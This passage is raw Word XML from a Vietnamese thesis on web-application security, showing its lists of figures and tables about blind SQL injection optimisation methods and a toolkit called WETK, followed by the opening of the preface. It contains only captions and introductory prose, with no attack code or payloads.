            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 3.18: Kiến trúc của WETK</w:t>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc459819459 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>70</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0" w:history="1">
        <w:r w:rsidR="00E14CFD" w:rsidRPr="00D7206F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 3.19: Hướng dẫn sử dụng WETK</w:t>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc459819460 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>71</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1" w:history="1">
        <w:r w:rsidR="00E14CFD" w:rsidRPr="00D7206F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 3.20: Hiển thị các module đã có của WETK</w:t>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc459819461 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>71</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2" w:history="1">
        <w:r w:rsidR="00E14CFD" w:rsidRPr="00D7206F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 3.21: Hiển thị các option của module sqlinjection.blind</w:t>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc459819462 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>79</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3" w:history="1">
        <w:r w:rsidR="00E14CFD" w:rsidRPr="00D7206F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 3.22: Hiển thị các option của module sqlinjection.binary_search</w:t>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc459819463 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>80</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4" w:history="1">
        <w:r w:rsidR="00E14CFD" w:rsidRPr="00D7206F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 3.23: Hiển thị các option của module sqlinjection.bit_shift</w:t>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc459819464 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>80</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5" w:history="1">
        <w:r w:rsidR="00E14CFD" w:rsidRPr="00D7206F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 3.24: Biểu đồ số lượng yêu cầu và thời gian của từng phương pháp (trường hợp độ dài là 1)</w:t>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc459819465 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>85</w:t>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E14CFD" w:rsidRDefault="001E10B4" w:rsidP="00E14CFD">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
        </w:tabs>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc459819466" w:history="1">
        <w:r w:rsidR="00E14CFD" w:rsidRPr="00D7206F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 3.25: Biểu đồ số lượng yêu cầu và thời gian của từng phương pháp (trường hợp độ dài là 27)</w:t>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc459819466 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>85</w:t>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="003E0ED1" w:rsidRDefault="003308DA" w:rsidP="00E14CFD">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00587B19" w:rsidRDefault="00587B19">
      <w:pPr>
        <w:suppressAutoHyphens w:val="0"/>
        <w:spacing w:line="252" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C37E54" w:rsidRPr="00C37E54" w:rsidRDefault="00C37E54" w:rsidP="00C93A9C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc459822482"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>DANH MỤC BẢNG BIỂU</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w:rsidR="003479FE" w:rsidRDefault="003479FE" w:rsidP="003479FE">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
        </w:tabs>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> TOC \h \z \c "Bảng" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:hyperlink w:anchor="_Toc459803829" w:history="1">
        <w:r w:rsidRPr="00E57750">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Bảng 2.1: Ví dụ chuyển đổi giữa các hệ cơ số</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc459803829 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>35</w:t>
        </w:r>
        <w:r>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0" w:history="1">
        <w:r w:rsidR="003479FE" w:rsidRPr="00E57750">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Bảng 2.2: Minh họa tấn công sử dụng phương pháp tối ưu hóa bằng dịch bit</w:t>
        </w:r>
        <w:r w:rsidR="003479FE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="003479FE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="003479FE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc459803830 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="003479FE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="003479FE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>38</w:t>
        </w:r>
        <w:r w:rsidR="003479FE">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1" w:history="1">
        <w:r w:rsidR="003479FE" w:rsidRPr="00E57750">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Bảng 3.1: Các cách sắp xếp để hiển thị ký tự</w:t>
        </w:r>
        <w:r w:rsidR="003479FE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="003479FE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="003479FE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc459803831 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="003479FE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="003479FE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>49</w:t>
        </w:r>
        <w:r w:rsidR="003479FE">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2" w:history="1">
        <w:r w:rsidR="003479FE" w:rsidRPr="00E57750">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Bảng 3.2: Bảng chuyển đổi giữa thứ tự và mã ASCII của ký tự</w:t>
        </w:r>
        <w:r w:rsidR="003479FE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="003479FE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="003479FE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc459803832 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="003479FE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="003479FE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>52</w:t>
        </w:r>
        <w:r w:rsidR="003479FE">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3" w:history="1">
        <w:r w:rsidR="003479FE" w:rsidRPr="00E57750">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Bảng 3.3: Bảng chuyển đổi giữa thứ tự và mã ASCII của ký tự đầu tiên trong tên CSDL</w:t>
        </w:r>
        <w:r w:rsidR="003479FE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="003479FE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="003479FE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc459803833 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="003479FE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="003479FE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>53</w:t>
        </w:r>
        <w:r w:rsidR="003479FE">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4" w:history="1">
        <w:r w:rsidR="003479FE" w:rsidRPr="00E57750">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Bảng 3.4: Bảng chuyển đổi giữa thứ tự và mã ASCII của ký tự thứ hai lấy được</w:t>
        </w:r>
        <w:r w:rsidR="003479FE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="003479FE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="003479FE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc459803834 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="003479FE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="003479FE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>55</w:t>
        </w:r>
        <w:r w:rsidR="003479FE">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5" w:history="1">
        <w:r w:rsidR="003479FE" w:rsidRPr="00E57750">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Bảng 3.5: Phương pháp tham số trong ADO.NET Framework</w:t>
        </w:r>
        <w:r w:rsidR="003479FE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="003479FE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="003479FE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc459803835 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="003479FE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="003479FE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>61</w:t>
        </w:r>
        <w:r w:rsidR="003479FE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="003479FE" w:rsidRDefault="001E10B4" w:rsidP="003479FE">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
        </w:tabs>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc459803836" w:history="1">
        <w:r w:rsidR="003479FE" w:rsidRPr="00E57750">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Bảng 3.6: Bảng so sánh tối ưu hóa giữa các phương pháp</w:t>
        </w:r>
        <w:r w:rsidR="003479FE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="003479FE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="003479FE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc459803836 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="003479FE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="003479FE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>84</w:t>
        </w:r>
        <w:r w:rsidR="003479FE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="003E0ED1" w:rsidRDefault="003479FE" w:rsidP="003479FE">
      <w:pPr>
        <w:suppressAutoHyphens w:val="0"/>
        <w:spacing w:line="252" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E4E83" w:rsidRDefault="005E4E83">
      <w:pPr>
        <w:suppressAutoHyphens w:val="0"/>
        <w:spacing w:line="252" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F2BF6" w:rsidRDefault="007F2BF6" w:rsidP="00C93A9C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:sectPr w:rsidR="007F2BF6" w:rsidSect="00A23DF1">
          <w:footerReference w:type="default" r:id="rId8"/>
          <w:pgSz w:w="11907" w:h="16840" w:code="9"/>
          <w:pgMar w:top="1701" w:right="1134" w:bottom="1701" w:left="1701" w:header="0" w:footer="720" w:gutter="0"/>
          <w:pgNumType w:fmt="lowerRoman"/>
          <w:cols w:space="720"/>
          <w:formProt w:val="0"/>
          <w:docGrid w:linePitch="381" w:charSpace="-14337"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003E0ED1" w:rsidRPr="000A795D" w:rsidRDefault="0058383C" w:rsidP="00C93A9C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc459822483"/>
      <w:r w:rsidRPr="000A795D">
        <w:lastRenderedPageBreak/>
        <w:t>LỜI MỞ ĐẦU</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w:rsidR="00EE08FC" w:rsidRPr="001604F9" w:rsidRDefault="00EE08FC" w:rsidP="007D72F3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001604F9">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t>Ngày nay, công nghệ thông tin trở thành phần quan trọng, thiết yếu trong các hoạt động sản xuất kinh doanh, quản lý hành chính. Ứng dụng công nghệ thông tin đi tới từng hoạt động, công việc dù là nhỏ nhất. Trong đó, môi trường ứng dụng web được sử dụng nhiều nhất, vì tính tiện dụng, dễ dàng, không yêu cầu cài đặt, triển khai khó khăn phía người dùng cuối.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE08FC" w:rsidRPr="001604F9" w:rsidRDefault="00EE08FC" w:rsidP="00EE08FC">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001604F9">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t>Tuy nhiên, ứng dụng web luôn phải đối mặt với những nguy cơ mất an toàn thông tin. Nguyên nhân có thể xuất phát từ lỗi lập trình, lỗi khi triển khai, cài đặt ứng dụng, lỗi khi vận hành, khai thác ứng dụng. Những lỗi này có thể tạo điều kiện cho kẻ tấn công khai thác, chiếm quyền điều khiển ứng dụng và máy chủ, gây ảnh hưởng lớn tới công ty, doanh nghiệp, hoạt động sản xuất kinh doanh. Việc sử dụng những phần mềm, ứng dụng không an toàn đã làm hao tổn nhiều chi phí cho các ngành tài chính, y tế, năng lượng.. và nhiều cơ sở hạ tầng quan trọng khác. Khi mà các hệ thống số của chúng ta ngày càng sở nên phức tạp và liên thông, việc bảo vệ nó cũng trở nên khó khăn hơn gấp nhiều lần.</w:t>
      </w:r>
    </w:p>
